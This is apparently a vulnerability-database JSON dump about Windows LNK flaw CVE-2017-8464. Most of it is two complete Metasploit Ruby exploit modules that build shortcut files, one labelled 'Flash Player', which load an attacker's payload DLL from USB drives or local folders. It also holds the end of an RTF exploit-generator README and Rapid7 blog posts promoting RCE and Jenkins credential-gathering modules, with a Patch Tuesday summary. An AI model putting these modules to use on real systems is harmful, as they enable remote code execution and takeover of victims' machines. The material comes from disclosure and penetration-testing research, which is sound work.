Raise awareness of exploitation techniques used in the wild, and help defenders to detect exploitation attempts.\n\n## How to run\n\nSimply run the script, providing an Sct file to execute, and an output name for your RTF file:\n\n python packager_composite_moniker.py -s calc.sct -o example.rtf\n [+] RTF file written to: example.rtf\n\n\n## Detection\n\nI have included a Yara rule to detect attempts to exploit this vulnerability via RTF.\n\n## References\n\n- https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html\n- https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/\n- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-08-02T14:47:22", "description": "", "cvss3": {}, "published": "2017-08-01T00:00:00", "type": "packetstorm", "title": "Microsoft Windows LNK Shortcut File Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-08-01T00:00:00", "id": "PACKETSTORM:143623", "href": "https://packetstormsecurity.com/files/143623/Microsoft-Windows-LNK-Shortcut-File-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \n \nattr_accessor :exploit_dll_name \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'LNK Remote Code Execution Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) \nthat contain a dynamic icon, loaded from a malicious DLL. \n \nThis vulnerability is a variant of MS15-020 (CVE-2015-0096). 
The created LNK file is \nsimilar except that an additional SpecialFolderDataBlock is included. The folder ID set \nin this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass \nthe CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary \nDLL file. \n}, \n'Author' => \n[ \n'Uncredited', # vulnerability discovery \n'Yorick Koster' # msf module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2017-8464'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], \n['URL', 'http://paper.seebug.org/357/'], # writeup \n['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ], \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ] \n], \n'DefaultTarget' => 0, # Default target is 64-bit \n'DisclosureDate' => 'Jun 13 2017')) \n \nregister_advanced_options( \n[ \nOptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]) \n]) \nend \n \ndef exploit \ndll = generate_payload_dll \ndll_name = \"#{rand_text_alpha(16)}.dll\" \ndll_path = store_file(dll, dll_name) \nprint_status(\"#{dll_path} created, copy it to the root folder of the target USB drive\") \n \n# HACK the vulnerability doesn't appear to work with UNC paths \n# Create LNK files to different drives instead \n'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i| \nlnk = generate_link(\"#{i}:\\\\#{dll_name}\") \nlnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\") \nprint_status(\"#{lnk_path} created, copy to the USB drive if drive letter is #{i}\") \nend \nend \n \ndef generate_link(path) \npath << \"\\x00\" \ndisplay_name = \"Flash Player\\x00\" # LNK Display Name \ncomment = \"\\x00\" \n \n# Control Panel Applet ItemID with our 
DLL \ncpl_applet = [ \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00 \n].pack('C*') \ncpl_applet << [path.length].pack('v') \ncpl_applet << [display_name.length].pack('v') \ncpl_applet << path.unpack('C*').pack('v*') \ncpl_applet << display_name.unpack('C*').pack('v*') \ncpl_applet << comment.unpack('C*').pack('v*') \n \n# LinkHeader \nret = [ \n0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C \n0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 \n0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) \n0x00, 0x00, 0x00, 0x00, # FileAttributes \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime \n0x00, 0x00, 0x00, 0x00, # FileSize \n0x00, 0x00, 0x00, 0x00, # IconIndex \n0x00, 0x00, 0x00, 0x00, # ShowCommand \n0x00, 0x00, # HotKey \n0x00, 0x00, # Reserved1 \n0x00, 0x00, 0x00, 0x00, # Reserved2 \n0x00, 0x00, 0x00, 0x00 # Reserved3 \n].pack('C*') \n \n# IDList \nidlist_data = '' \nidlist_data << [0x12 + 2].pack('v') # ItemIDSize \nidlist_data << [ \n# This PC \n0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [0x12 + 2].pack('v') # ItemIDSize \nidlist_data << [ \n# All Control Panel Items \n0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \nidlist_data << [cpl_applet.length + 2].pack('v') \nidlist_data << cpl_applet \nidlist_data << [0x00].pack('v') # TerminalID \n \n# LinkTargetIDList \nret << [idlist_data.length].pack('v') # IDListSize \nret << idlist_data \n \n# ExtraData \n# SpecialFolderDataBlock \nret << [ \n0x10, 0x00, 0x00, 0x00, # BlockSize \n0x05, 0x00, 0x00, 0xA0, # 
BlockSignature 0xA0000005 \n0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel) \n0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList \n].pack('C*') \n# TerminalBlock \nret << [0x00, 0x00, 0x00, 0x00].pack('V') \nret \nend \n \n# Store the file in the MSF local directory (eg, /root/.msf4/local/) \ndef store_file(data, filename) \nltype = \"exploit.fileformat.#{self.shortname}\" \n \nif ! ::File.directory?(Msf::Config.local_directory) \nFileUtils.mkdir_p(Msf::Config.local_directory) \nend \n \nif filename and not filename.empty? \nif filename =~ /(.*)\\.(.*)/ \next = $2 \nfname = $1 \nelse \nfname = filename \nend \nelse \nfname = \"local_#{Time.now.utc.to_i}\" \nend \n \nfname = ::File.split(fname).last \n \nfname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '') \nfname << \".#{ext}\" \n \npath = File.join(\"#{Msf::Config.local_directory}/\", fname) \nfull_path = ::File.expand_path(path) \nFile.open(full_path, \"wb\") { |fd| fd.write(data) } \n \nfull_path.dup \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143623/mswinlnk-exec.rb.txt"}, {"lastseen": "2017-11-09T22:09:36", "description": "", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "packetstorm", "title": "Microsoft Windows LNK File Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0095", "CVE-2015-0096"], "modified": "2017-11-08T00:00:00", "id": "PACKETSTORM:144927", "href": "https://packetstormsecurity.com/files/144927/Microsoft-Windows-LNK-File-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File 
\ninclude Msf::Post::Windows::Priv \n \nattr_accessor :exploit_dll_name \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'LNK Code Execution Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) \nthat contain a dynamic icon, loaded from a malicious DLL. \n \nThis vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is \nsimilar except an additional SpecialFolderDataBlock is included. The folder ID set \nin this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass \nthe CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary \nDLL file. \n \nThe PATH option must be an absolute path to a writeable directory which is indexed for \nsearching. If no PATH is specified, the module defaults to %USERPROFILE%. \n}, \n'Author' => \n[ \n'Uncredited', # vulnerability discovery \n'Yorick Koster', # msf module \n'Spencer McIntyre' # msf module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2017-8464'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], \n['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup \n['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format \n['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'], \n['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'FileDropperDelay' => 15, \n'WfsDelay' => 30 \n}, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => \n{ \n'Space' => 2048 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ], \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ] \n], \n'DefaultTarget' => 0, # Default target is Automatic \n'DisclosureDate' => 'Jun 13 
2017' \n) \n) \n \nregister_options( \n[ \nOptString.new('FILENAME', [false, 'The LNK file']), \nOptString.new('DLLNAME', [false, 'The DLL file containing the payload']), \nOptString.new('PATH', [false, 'An explicit path to where the files should be written to']) \n] \n) \n \nregister_advanced_options( \n[ \nOptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), \nOptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) \n] \n) \nend \n \ndef check \nif session.sys.process['SearchIndexer.exe'] \nreturn Exploit::CheckCode::Detected \nend \n \nExploit::CheckCode::Safe \nend \n \ndef get_name(option, default_ext) \nname = datastore[option].to_s.strip \nname = \"#{rand_text_alpha(16)}.#{default_ext}\" if name.blank? \nname \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif session.platform != 'windows' \nfail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') \nend \n \nif check == Exploit::CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'Exploit not available on this system.') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') \narch = target['Arch'] == ARCH_ANY ? 
payload.arch.first : target['Arch'] \ndatastore['EXE::Path'] = path \ndatastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\") \n \npath = datastore['PATH'] || session.fs.file.expand_path(\"%USERPROFILE%\") \npath.chomp!(\"\\\\\") \n \ndll_path = \"#{path}\\\\#{get_name('DLLNAME', 'dll')}\" \nwrite_file(dll_path, generate_payload_dll) \n \nlnk_path = \"#{path}\\\\#{get_name('FILENAME', 'lnk')}\" \nwrite_file(lnk_path, generate_link(dll_path)) \nregister_files_for_cleanup(dll_path, lnk_path) \nend \n \ndef file_rm(file) \nif file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true) \n@dropped_files.delete(file) \nend \nend \n \ndef generate_link(path) \nvprint_status(\"Generating LNK file to load: #{path}\") \npath += \"\\x00\" # Do not use << here \ndisplay_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name \ncomment = datastore['LnkComment'].dup << \"\\x00\" \n \n# Control Panel Applet ItemID with our DLL \ncpl_applet = [ \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00 \n].pack('C*') \ncpl_applet << [path.length].pack('v') \ncpl_applet << [display_name.length].pack('v') \ncpl_applet << path.unpack('C*').pack('v*') \ncpl_applet << display_name.unpack('C*').pack('v*') \ncpl_applet << comment.unpack('C*').pack('v*') \n \n# LinkHeader \nret = [ \n0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C \n0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 \n0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) \n0x00, 0x00, 0x00, 0x00, # FileAttributes \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime \n0x00, 0x00, 0x00, 0x00, # FileSize \n0x00, 0x00, 0x00, 0x00, # 
IconIndex \n0x00, 0x00, 0x00, 0x00, # ShowCommand \n0x00, 0x00, # HotKey \n0x00, 0x00, # Reserved1 \n0x00, 0x00, 0x00, 0x00, # Reserved2 \n0x00, 0x00, 0x00, 0x00 # Reserved3 \n].pack('C*') \n \n# IDList \nidlist_data = '' \n# ItemID = ItemIDSize (2 bytes) + Data (variable) \nidlist_data << [0x12 + 2].pack('v') \nidlist_data << [ \n# All Control Panel Items \n0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, \n0x30, 0x9d \n].pack('C*') \n# ItemID = ItemIDSize (2 bytes) + Data (variable) \nidlist_data << [cpl_applet.length + 2].pack('v') \nidlist_data << cpl_applet \nidlist_data << [0x00].pack('v') # TerminalID \n \n# LinkTargetIDList \nret << [idlist_data.length].pack('v') # IDListSize \nret << idlist_data \n \n# ExtraData \n# SpecialFolderDataBlock \nret << [ \n0x10, 0x00, 0x00, 0x00, # BlockSize \n0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005 \n0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel) \n0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList \n].pack('C*') \n# TerminalBlock \nret << [0x00, 0x00, 0x00, 0x00].pack('V') \nret \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144927/cve_2017_8464_lnk_lpe.rb.txt"}], "rapid7community": [{"lastseen": "2017-08-21T18:09:25", "description": "<!-- [DocumentBodyStart:3836c61a-5d77-47a8-9728-65d7e934a989] --><div class=\"jive-rendered-content\"><h2>Slowloris: SMB edition</h2><p>Taking a page from the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fweb.archive.org%2Fweb%2F20090822001255%2Fhttp%3A%2F%2Fha.ckers.org%2Fslowloris%2F\" rel=\"nofollow\" target=\"_blank\">Slowloris HTTP DoS attack</a>, the aptly named <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7946\" data-objectType=\"38\" 
href=\"https://community.rapid7.com/community/infosec/blog/2017/08/03/smbloris-what-you-need-to-know\">SMBLoris DoS attack</a> exploits a vuln contained in <em>many</em> Windows releases (back to Windows 2000) and also affects Samba (a popular open source SMB implementation). Through creation of many connections to a target's SMB port, an attacker can exhaust all available memory on the target by sending a specific NBSS length header value over those connections, rendering the system unusable or crashed (if desired). And systems with SMB disabled are vulnerable to this attack too. Word is that Microsoft currently has no plans to issue a fix. Following the SMBLoris reveal at DEF CON (hat tip to the researchers at RiskSense!), Metasploit Framework now contains an <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8796\" rel=\"nofollow\" target=\"_blank\">exploit module</a> for fulfilling your SMBLoris needs.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>The Adventure of LNK</h2><p>Think Windows shortcut files are a convenient way to reference a file from multiple places? How about as an attack vector to get remote code execution on a target? Affecting a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2017-8464\" rel=\"nofollow\" target=\"_blank\">wide range of Windows releases</a>, a recently-landed <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8767\" rel=\"nofollow\" target=\"_blank\">exploit module</a> might be just what you're looking for to give this vector a go. 
Microsoft did release a patch this past June, but we're gonna guess a lot of systems still haven't picked that up yet.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Would you like RCE with your PDF (reader)?</h2><p>If so, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.gonitro.com%2Fpdf-reader\" rel=\"nofollow\" target=\"_blank\">Nitro's PDF reader</a> might be your hookup. Many versions of both Pro and regular flavors of the reader are vulnerable, providing JavaScript APIs which allow writing a payload to disk and then executing it. Check out the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Ffileformat%2Fnitro_reader_jsapi\" target=\"_blank\">new exploit module</a> and enjoy some of that tasty RCE.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Jenkins, tell me your secrets...</h2><p>If you periodically happen upon a target running Jenkins, we've got a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8627\" rel=\"nofollow\" target=\"_blank\">new post module</a> you might find useful. jenkins_gather will locate where Jenkins is installed on a system and then proceed to look for creds, tokens, SSH keys, etc., decrypting what it finds and conveniently adding it to your loot. 
It's been tested on a number of <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Fthesubtlety%2Fmetasploit-framework%2Fblob%2F7d033688ce2ca9221dcbed5b992798163cc12b56%2Fdocumentation%2Fmodules%2Fpost%2Fmulti%2Fgather%2Fjenkins_gather.md\" rel=\"nofollow\" target=\"_blank\">versions and platforms</a> and is ready for you to give it a try.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>And more!</h2><p>We've also:</p><ul><li>enabled ed25519 support with net-ssh</li><li>added better error handling for the Eternal Blue exploit module when it encounters a system that has SMB1 disabled (thx, <span class=\"citation\">@multiplex3r</span>!)</li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>New Modules</h2><p><em>Exploit modules</em> <em>(2 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Ffileformat%2Fcve_2017_8464_lnk_rce\" target=\"_blank\">LNK Code Execution Vulnerability</a> by Uncredited and Yorick Koster exploits CVE-2017-8464</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Ffileformat%2Fnitro_reader_jsapi\" target=\"_blank\">Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution</a> by sinn3r, Brendan Coles, and mr_me exploits CVE-2017-7442</li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><em>Auxiliary and post modules</em> <em>(2 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fdos%2Fsmb%2Fsmb_loris\" target=\"_blank\">SMBLoris NBSS Denial of Service</a> by thelightcosine</li><li><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fpost%2Fmulti%2Fgather%2Fjenkins_gather\" target=\"_blank\">Jenkins Credential Collector</a> by thesubtlety</li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with <code>msfupdate</code> and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpulls%3Fq%3Dis%3Apr%2Bmerged%3A%25222017-07-28T09%3A59%3A11-07%3A00%2B..%2B2017-08-10T11%3A06%3A05-05%3A00%2522\" rel=\"nofollow\" target=\"_blank\">Pull Requests 4.15.4...4.15.6</a></li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fcompare%2F4.15.4...4.15.6\" rel=\"nofollow\" target=\"_blank\">Full diff 4.15.4...4.15.6</a></li></ul><p>To install fresh, check out the open-source-only <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fwiki%2FNightly-Installers\" rel=\"nofollow\" target=\"_blank\">Nightly Installers</a>, or the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload.jsp\" target=\"_blank\">binary installers</a> which also include the commercial editions.</p></div><!-- [DocumentBodyEnd:3836c61a-5d77-47a8-9728-65d7e934a989] -->", "cvss3": {}, "published": "2017-08-11T20:03:59", "title": "Metasploit Wrapup", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-7442", "CVE-2017-8464"], "modified": "2017-08-11T20:03:59", "id": "RAPID7COMMUNITY:4FC64923DC47E63250AA753E591FC7A7", "href": 
"https://community.rapid7.com/community/metasploit/blog/2017/08/11/metasploit-wrapup", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-27T11:16:57", "description": "<!-- [DocumentBodyStart:f6326a4d-b6b0-402e-9ffb-8eebecb2bf70] --><div class=\"jive-rendered-content\"><p>This month sees another spate of <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-us%2Fsecurity-guidance%2Freleasenotedetail%2F40969d56-1b2a-e711-80db-000d3a32fc99\" rel=\"nofollow\" target=\"_blank\">critical fixes</a> from Microsoft, including patches for a number of Remote Code Execution (RCE) vulnerabilities. Two of these are already known to be exploited in the wild (<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8543\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8543</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8464\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8464</a>). Today's patches are so crucial that Microsoft has once again released <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fblogs.technet.microsoft.com%2Fmsrc%2F2017%2F06%2F13%2Fjune-2017-security-update-release%2F\" rel=\"nofollow\" target=\"_blank\">fixes for end-of-life operating systems</a>, citing \"the elevated risk for destructive cyber attacks at this time,\" and explicitly calling out the threat of nation-state actors. Updates are available for Windows XP, Windows Vista, Windows 8, and Windows Server 2003. 
They include fixes for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftechnet.microsoft.com%2Fen-us%2Flibrary%2Fsecurity%2Fms17-013.aspx\" rel=\"nofollow\" target=\"_blank\">MS17-013</a> (a Security Bulletin from April), as well as 21 CVEs with impact ranging across RCE, information disclosure, and elevation of privilege. Further details are available in Microsoft's <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Ftechnet.microsoft.com%2Fen-us%2Flibrary%2Fsecurity%2F4025685.aspx\" rel=\"nofollow\" target=\"_blank\">Security Advisory 4025685</a>.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>This month's updates aren't just about severity, but quantity as well, with 94 separate flaws being patched (compared to 66 last month, and 44 in April). This doesn't even include the nine critical <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FADV170007\" rel=\"nofollow\" target=\"_blank\">Adobe Flash Player RCE vulnerabilities</a> (see <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fhelpx.adobe.com%2Fsecurity%2Fproducts%2Fflash-player%2Fapsb17-17.html\" rel=\"nofollow\" target=\"_blank\">APSB17-17</a> for details) that are also being fixed today and are rated \"Priority 1\" (meaning there is a high risk of vulnerable systems being targeted in the wild).</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Most of the vulnerabilities are for Windows, split evenly between desktop and server flavors. 
All of the Windows CVEs have a severity of Important or Critical, with the bulk of impact being information disclosure, followed by RCE, privilege escalation, and some security feature bypass vulnerabilities in newer versions of Windows (8.1, 10, Server 2012 R2, and Server 2016).</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Microsoft Office and Office-related software (e.g. SharePoint, Lync/Skype for Business, and Office Web Apps) also have plenty of vulnerabilities being addressed this month, with thirteen information disclosure vulnerabilities and twelve RCEs between them all. In addition to various RCE vulnerabilities for SharePoint being patched, Microsoft has released a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FADV170008\" rel=\"nofollow\" target=\"_blank\">defense-in-depth</a> update for SharePoint Enterprise Server 2013 SP1 and Enterprise Server 2016 that harden the products without addressing specific vulnerabilities.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>As usual, web technologies continue to provide additional attack surface. 16 issues with the Edge browser have been patched: 10 RCE, 3 information disclosure and 3 security feature bypass vulnerabilities. Internet Explorer sees 4 RCE and 2 information disclosure bugs being fixed. 
Last but not least, two critical RCE vulnerabilities in Silverlight have also been patched (<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-us%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-0283\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0283</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8527\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8527</a>, each of which also affects several other products).</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Hopefully you don't have any obsolete operating systems in your environment. But if you do, be sure to apply this month's patches as attackers often see end-of-life systems as low-hanging fruit, and exploits are already out there. Of course, this means supported systems are also at significant risk. Best get patching!</p></div><!-- [DocumentBodyEnd:f6326a4d-b6b0-402e-9ffb-8eebecb2bf70] -->", "cvss3": {}, "published": "2017-06-14T12:04:23", "title": "Patch Tuesday - June 2017", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543", "CVE-2017-0283", "CVE-2017-8527"], "modified": "2017-06-14T12:04:23", "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/14/patch-tuesday-june-2017", "id": "RAPID7COMMUNITY:5EEA40487C97CFD1AC5560D7EB4368F6", 